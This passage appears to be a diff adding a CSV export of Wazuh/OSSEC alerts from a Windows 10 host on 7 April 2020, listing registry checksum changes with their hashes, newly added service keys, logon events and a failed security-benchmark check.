+Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 7, 2020 @ 09:29:50.895",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '40f25468dcd84290dd7a261b9ebe519b' +New md5sum is : 'b7a68a188bc32e74c5681ba9afece236' +Old sha1sum was: '59cbd60494640ca425146424a80456e3bf10847a' +New sha1sum is : 'a36f4c5a82f40650029849ab2f8acf8e87dbcdc2' +" +"Apr 7, 2020 @ 09:29:50.879",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '61a910cd0eb02db74956a0b4e2c32a83' +New md5sum is : '44a0c8dbeec3602d58be41d6d80c10ca' +Old sha1sum was: 'cd9fc634c8dc13de4676ed7f923cc356b262be96' +New sha1sum is : 'b8543c052715aee60c6b66b6084735a08bcbedae' +" +"Apr 7, 2020 @ 09:29:50.535",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '740b0c6a4541da11b8946fee541d4b2f' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : '09c2df703e77148e106a800bd664678d5372641a' +" +"Apr 7, 2020 @ 09:29:49.145",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '997c8620c2190b0bd117790258bc3703' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a01b5b53e6c6cf8c359de7ccd29c696d00b14c47' +" +"Apr 7, 2020 @ 09:29:48.488",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '64f0bed972f71b0351e53c0a12523580' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : 'afa9231adac28f47558168b1889d787b5c52f3e1' +" +"Apr 7, 2020 @ 09:29:48.238",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:48.222",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:48.113",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : 'f59a2876dd77ee8c0b8f6fa7297cdf8f' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '0ac7dceee2c501bf3c43ceb5bfb39434d0ce905e' +" +"Apr 7, 2020 @ 09:29:47.928",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : 'e136f27d00387733799ad1811c4f6232' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : '874b705bc209750341c7a9585c13009157bf42bf' +" +"Apr 7, 2020 @ 09:29:47.114",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:47.098",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:46.910",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '997c8620c2190b0bd117790258bc3703' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a01b5b53e6c6cf8c359de7ccd29c696d00b14c47' +" +"Apr 7, 2020 @ 09:29:45.988",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: '06f5c6f330af834dd08ce904d9ae7cc8' +New md5sum is : 'f5ea91602eb594fc2b4973f59a513fcb' +Old sha1sum was: '0cf4c4c19a1201e41b9deba273320298f4f97b50' +New sha1sum is : '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +" +"Apr 7, 2020 @ 09:29:42.489",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '83e44ac722dae2eebc032fde9df5f759' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : 'c454d8444913422a105737f1049f27fdaa4c8f36' +" +"Apr 7, 2020 @ 09:29:40.348",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:29:39.378",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 7, 2020 @ 09:29:37.191",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. 
+Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 7, 2020 @ 09:29:37.175",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '951ed48ea2b16a4b11a3e3fc66e0c792' +New md5sum is : '0dc6107d346e486ffbd805887c817f6a' +Old sha1sum was: '91243c9a9bc671b7729496f2396ac68cf2ac6a62' +New sha1sum is : 'cf56a3f940726a655d5b18eb37e6ad09abcc5392' +" +"Apr 7, 2020 @ 09:29:36.441",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelService 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:36.410",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelOperation 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:36.363",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelEndpoint 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:32.300",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 7, 2020 @ 09:29:30.643",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:30.628",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a22d\Security' was added. 
+" +"Apr 7, 2020 @ 09:29:29.691",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:29.675",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:28.316",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:28.300",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:25.815",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '810a2698826d8f1b679d50e9b9d557e4' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'e8aaa4f248e5f8e1fcecec5191c66118cef34fb2' +" +"Apr 7, 2020 @ 09:29:23.675",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '6d753fa2ef35abd925bd9dcf4dc03096' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '9dd2b15a076fb02ab48d4f71019bd332d54cf2f6' +" +"Apr 7, 2020 @ 09:29:23.534",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSDTC Bridge 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:21.175",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'c161d9bd5b6a8cfe80d82ef900158722' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : 'bfc96ff4fe7ac373f7bd4b0a0f216977f6fe0a7e' +" +"Apr 7, 2020 @ 09:29:20.628",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:20.612",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a22d\TriggerInfo\0' was added. +" +"Apr 7, 2020 @ 09:29:20.597",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:16.644",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '74d8b67e4f09148a51ac041b5fe1d273' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'bc126e4b3acf98b774af380050065c1bac9c96a9' +" +"Apr 7, 2020 @ 09:29:15.378",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '104defe729ae9bda08ceba8db6011fad' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '35c66a90bf72d1ac3bf30c5ae88e8ea4fbe8fb8c' +" +"Apr 7, 2020 @ 09:29:12.831",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'a0c2b17e4da2d89a30df42e74562f981' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'f683b3c9e8767975381dd8b9181008a14740b34f' +" +"Apr 7, 2020 @ 09:29:12.537",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '104defe729ae9bda08ceba8db6011fad' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '35c66a90bf72d1ac3bf30c5ae88e8ea4fbe8fb8c' +" +"Apr 7, 2020 @ 09:29:11.503",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 7, 2020 @ 09:29:10.816",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:29:03.987",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'b438287205551e620ab2c95fcb9f7aec' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : '4f6a91aefc181a8f28ab98b71caf9ee0aea4f342' +" +"Apr 7, 2020 @ 09:28:55.706",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '002fbb6d4418b9fd21624330abf26b96' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '47df610fa011d1737dab6422e726b5ca4854c724' +" +"Apr 7, 2020 @ 09:28:53.909",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.894",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:53.832",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.816",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:53.581",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.566",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:53.362",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.347",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:52.863",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:52.847",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a22d\Security' was added. 
+" +"Apr 7, 2020 @ 09:28:52.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '997c8620c2190b0bd117790258bc3703' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a01b5b53e6c6cf8c359de7ccd29c696d00b14c47' +" +"Apr 7, 2020 @ 09:28:51.300",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:51.270",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:51.128",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:51.112",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:51.050",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:51.034",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:48.909",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:48.894",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\4' was added. +" +"Apr 7, 2020 @ 09:28:48.878",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\3' was added. 
+" +"Apr 7, 2020 @ 09:28:48.862",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\2' was added. +" +"Apr 7, 2020 @ 09:28:48.847",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\1' was added. +" +"Apr 7, 2020 @ 09:28:48.831",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\0' was added. +" +"Apr 7, 2020 @ 09:28:48.815",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:48.691",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +" +"Apr 7, 2020 @ 09:28:47.863",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:47.847",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:47.597",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '6b42f4801651e4d3b137db361363e5bc' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '01e371540c88a9076bfd40a9b78d8b02ac58ed21' +" +"Apr 7, 2020 @ 09:28:47.581",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'e510c2836bdf17e888da83477202fdf2' +New md5sum is : '4d2c8324bc0b4e2640acfce731141287' +Old sha1sum was: '5b0363519c9bfe1d8b5e43ec76b79940f2cbabd8' +New sha1sum is : 'e90edd157b2f05e45cb1d6601c23f8cbe5090510' +" +"Apr 7, 2020 @ 09:28:47.550",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : 'f09e9d80a3ff39b221faf0fd1df28a3d' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '24a3a0c2511e02ee6434188393c0f80a1f57c2da' +" +"Apr 7, 2020 @ 09:28:45.206",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:45.191",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a22d\Security' was added. 
+" +"Apr 7, 2020 @ 09:28:39.394",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:56.613",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:27:30.222",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:26.988",3,"Windows User Logoff", +"Apr 7, 2020 @ 09:27:26.972",3,"Windows User Logoff", +"Apr 7, 2020 @ 09:27:26.941",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:26.926",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:25.960",5,"License Activation (slui.exe) failed", +"Apr 7, 2020 @ 09:27:23.566",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 7, 2020 @ 09:27:18.676",3,"The Windows Search Service started", +"Apr 7, 2020 @ 09:27:18.035",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:18.006",3,"The database engine attached a database", +"Apr 7, 2020 @ 09:27:17.822",3,"The database engine is starting a new instance", +"Apr 7, 2020 @ 09:27:16.373",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 7, 2020 @ 09:27:12.845",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:12.801",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:11.901",5,"SessionEnv was unavailable to handle a notification event", +"Apr 7, 2020 @ 09:27:11.363",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 7, 2020 @ 09:27:09.872",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:09.136",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." 
+"Apr 7, 2020 @ 09:26:33.122",5,"SessionEnv was unavailable to handle a notification event", +"Apr 7, 2020 @ 09:26:33.106",5,"WSearch was unavailable to handle a notification event", +"Apr 7, 2020 @ 09:25:48.091",5,"The VSS service is shutting down due to idle timeout", +"Apr 7, 2020 @ 09:25:40.950",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '6f75474aaa9a474cff10b8bd50900934' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'd7d28f2e9d5094b6372ab6f31fa663975676e179' +" +"Apr 7, 2020 @ 09:25:40.919",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '6f75474aaa9a474cff10b8bd50900934' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'd7d28f2e9d5094b6372ab6f31fa663975676e179' +" +"Apr 7, 2020 @ 09:25:40.903",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{FEBEF00C-046D-438D-8A88-BF94A6C9E703}' was added. +" +"Apr 7, 2020 @ 09:25:40.670",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}' was added. +" +"Apr 7, 2020 @ 09:25:32.901",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Windows Workflow Foundation 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:32.872",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Windows Workflow Foundation 3.0.0.0\Linkage' was added. 
+" +"Apr 7, 2020 @ 09:25:28.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '02583aa1ae32b1990176644dc3952c81' +New md5sum is : '40f25468dcd84290dd7a261b9ebe519b' +Old sha1sum was: '0ba688310b1196088281fa0da17b1e9c2f96ea7e' +New sha1sum is : '59cbd60494640ca425146424a80456e3bf10847a' +" +"Apr 7, 2020 @ 09:25:28.687",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'd3c3db84b379850af744b570210159ac' +New md5sum is : '61a910cd0eb02db74956a0b4e2c32a83' +Old sha1sum was: '61986d785485024b932a0f9116e6a930eddd2d4b' +New sha1sum is : 'cd9fc634c8dc13de4676ed7f923cc356b262be96' +" +"Apr 7, 2020 @ 09:25:19.817",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:25:13.268",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SMSvcHost 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:13.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SMSvcHost 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:25:12.032",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:25:10.975",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System' checksum changed. +Old md5sum was: 'f9c30ebda6d2dc73e07421bea47bcee5' +New md5sum is : '7461912cddc48e370914df96821392af' +Old sha1sum was: 'dcd0971cf15c3492c3db0b73cf973466bb442c96' +New sha1sum is : '34e3062b44f4f79b06af09725959400abdaa422c' +" +"Apr 7, 2020 @ 09:25:10.616",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: 'bd9b4beaac92fe5749542b077fdeffd0' +New md5sum is : '951ed48ea2b16a4b11a3e3fc66e0c792' +Old sha1sum was: '770460c89c9b82b0c4bc82f78b714a907c62fe5a' +New sha1sum is : '91243c9a9bc671b7729496f2396ac68cf2ac6a62' +" +"Apr 7, 2020 @ 09:25:09.270",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelService 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:09.246",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelOperation 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:09.237",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelEndpoint 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:24:53.130",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSDTC Bridge 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:24:42.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FontCache3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:42.642",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FontCache3.0.0.0\Security' was added. +" +"Apr 7, 2020 @ 09:24:40.940",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System\SMSvcHost 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:39.784",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:24:38.721",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System\MSDTC WS-AT Protocol' was added. +" +"Apr 7, 